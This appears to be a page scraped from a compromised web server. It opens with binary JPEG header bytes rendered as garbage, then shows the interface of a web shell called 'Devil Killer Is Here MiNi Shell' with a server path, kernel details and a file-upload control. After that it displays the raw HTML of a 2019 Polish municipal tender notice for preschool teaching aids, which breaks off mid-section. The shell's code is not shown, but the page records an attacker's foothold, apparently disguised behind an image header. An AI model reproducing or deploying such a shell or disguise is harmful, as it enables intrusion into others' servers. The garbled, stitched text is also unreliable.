JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20191230/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20191230/639059-N-2019.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 639059-N-2019 z dnia 2019-12-30 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Gmina Strzelce Krajeńskie</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">„Zakup i dostawa pomocy dydaktycznych do realizacji zajęć w ramach projektu pt: „Nowe miejsca wychowania przedszkolnego w OWP w Bobrówku gm. Strzelce Krajeńskie”</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Tak</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu">„Zakup i dostawa pomocy dydaktycznych do realizacji zajęć w ramach projektu pt: „Nowe miejsca wychowania przedszkolnego w OWP w Bobrówku gm. Strzelce Krajeńskie”</span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej – mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Gmina Strzelce Krajeńskie</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">21096676300000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Al. Wolności</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">48</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">66-500</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Strzelce Krajeńskie</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">lubuskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">95 763 11 30, </span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">urzad@strzelce.pl, </span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">957 633 294</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.strzelce.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.bip.strzelce.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">pisemnie</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Samorządowe Centrum Obsługi Placówek Oświatowych w Strzelcach Kraj. al. Wolności 48, 66-500 Strzelce Kraj., sekretariat</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">„Zakup i dostawa pomocy dydaktycznych do realizacji zajęć w ramach projektu pt: „Nowe miejsca wychowania przedszkolnego w OWP w Bobrówku gm. Strzelce Krajeńskie”</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">SCOPO.221.15.2019 </span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1. Wykonawca w ramach realizacji przedmiotu zamówienia we własnym zakresie i na własny koszt wykona zadanie pn. „Zakup i dostawa pomocy dydaktycznych do realizacji zajęć w ramach projektu pt: Nowe miejsca wychowania przedszkolnego w OWP w Bobrówku gm. Strzelce Krajeńskie”. Zadanie szczegółowo opisane jest w załączniku nr 1 do SIWZ – Opis przedmiotu zamówienia. 2. Zamawiający dopuszcza składanie ofert częściowych. Oferty można składać w odniesieniu do wszystkich części. Zamawiający nie ogranicza liczby części zamówienia, na które może zostać udzielone zamówienie jednemu Wykonawcy. Część I: Zakup i dostawę pomocy dydaktycznych: kącik manipulacyjno-sensorycznyCzęść II: Zakup i dostawa mebli 3. Dostawa obejmuje transport do bezpośredniego użytkownika, montaż i instalację w miejscu przez niego wskazanym i przekazanie do użytku oraz wszystkie inne koszty związane z wykonaniem przedmiotu zamówienia i wymogami stawianymi przez Zamawiającego.Oferowany towar ma być fabrycznie nowy, nieużywany oraz nieeksponowany na wystawach, sprawny technicznie, bezpieczny, kompletny. Musi posiadać aktualne atesty higieniczne lub aprobaty techniczne, lub certyfikaty dopuszczające do użytkowania w jednostkach oświatowych zgodnie z obowiązującymi przepisami prawa i normami na terenie Rzeczpospolitej Polskiej. Przedmiot zamówienia musi posiadać instrukcję obsługi oraz dokumenty gwarancyjne w języku polskim.Jeżeli w dokumentach opisujących przedmiot zamówienia znajdują się nazwy materiałów, urządzeń czy wyposażenia lub jakichkolwiek innych wyrobów lub produktów, to służą one jedynie i wyłącznie określeniu pożądanego standardu wykonania i określenia właściwości i wymogów techniczno - użytkowych założonych w dokumentacji technicznej dla danego typu rozwiązań, nie są obowiązujące i należy je traktować, jako propozycje Zamawiającego. Nie są one wiążące przyszłego Wykonawcę do ich stosowania. Wykonawca może zastosować materiały, wyposażenie czy urządzenia równoważne o parametrach techniczno–użytkowych odpowiadających co najmniej parametrom materiałów i urządzeń zaproponowanych w opisie przedmiotu zamówienia. Jeżeli wykonawca stwierdzi, że użyte w opisie przedmiotu zamówienia parametry lub normy krajowe lub przenoszące na normy europejskie lub normy międzynarodowe mogą wskazywać na producentów lub źródła ich pochodzenia to oznacza, że mają takie znaczenie, że parametry techniczne tak wskazanych produktów określają wymagane przez Zamawiającego minimalne oczekiwania co do jakości produktów, które mają być użyte do wykonania przedmiotu zamówienia. Wykonawca jest uprawniony do stosowania produktów równoważnych, przez które rozumie się takie, które posiadają parametry techniczne nie gorsze od tych wskazanych w opisie przedmiotu zamówienia. Wykonawca ma obowiązek posiadać w stosunku do materiałów, wyposażenia czy urządzeń równoważnych dokumenty potwierdzające pozwolenie na ich zastosowanie (certyfikaty, aprobaty techniczne lub deklaracje właściwości użytkowych).Dopuszcza się równoważne urządzenia, materiały pod warunkiem, że:a) zagwarantują one realizację zamówienia zgodnie z założeniami jakościowymi, technologicznymi i eksploatacyjnymi zawartymi w opisie przedmiotu zamówienia, b) zapewnią uzyskanie parametrów technicznych, technologicznych i jakościowych co najmniej równych parametrom założonym w opisie przedmiotu zamówienia, c) Wykonawca składający ofertę równoważną będzie zobowiązany do udowodnienia Zamawiającemu, że oferowane przez niego urządzenia lub materiały są równoważne w stosunku do zaproponowanych w opisie przedmiotu zamówienia. Wykonawca przedstawi niezbędne informacje dotyczące przyjętych do oferty urządzeń, wyposażenia i materiałów potwierdzające równoważność oferowanych urządzeń w stosunku do zaproponowanych w projekcie. Użycie urządzenia bez stwierdzenia pochodzenia jest niedopuszczalne. W przypadku zamontowania wyposażenia czy urządzenia, które nie będzie spełniać ww. wymagań skutkować będzie bezwzględnym demontażem na koszt wykonawcy i ze skutkami z tego wynikającymi. Na całość przedmiotu zamówienia składają się następujące czynności wykonane przez wykonawcę: 1. dostarczenie przedmiotu zamówienia do Szkoły Podstawowej im. Kazimierza Kremera w Bobrówku, własnym transportem, wniesienie do wskazanych przez dyrektora szkoły pomieszczeń.2. Wykonawca dostarczy przedmiot zamówienia do miejsca jego przeznaczenia, wypakuje, zmontuje, sprawdzi, skonfiguruje i uruchomi siłami własnymi. Wszystkie czynności związane z realizacją zamówienia ( np. przenoszenie, składania, sprzątanie itp.) wykonawca wykona przy pomocy własnych pracowników.Zamontowane wyposażenie nie może mieć wad i uszkodzeń mechanicznych, zadrapań i innych wad pogarszających ich jakość. Opakowania z dostarczonych materiałów mają być poskładane i zdeponowane w miejscu wskazanym przez Zamawiającego.Po wykonaniu dostawy wykonawca doprowadzi pomieszczenia do porządku, a odpady usunie na własny koszt.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">39162100-6</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów – szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2020-02-07</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow"></span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow"></span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Nie</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen"></span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu"></span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH 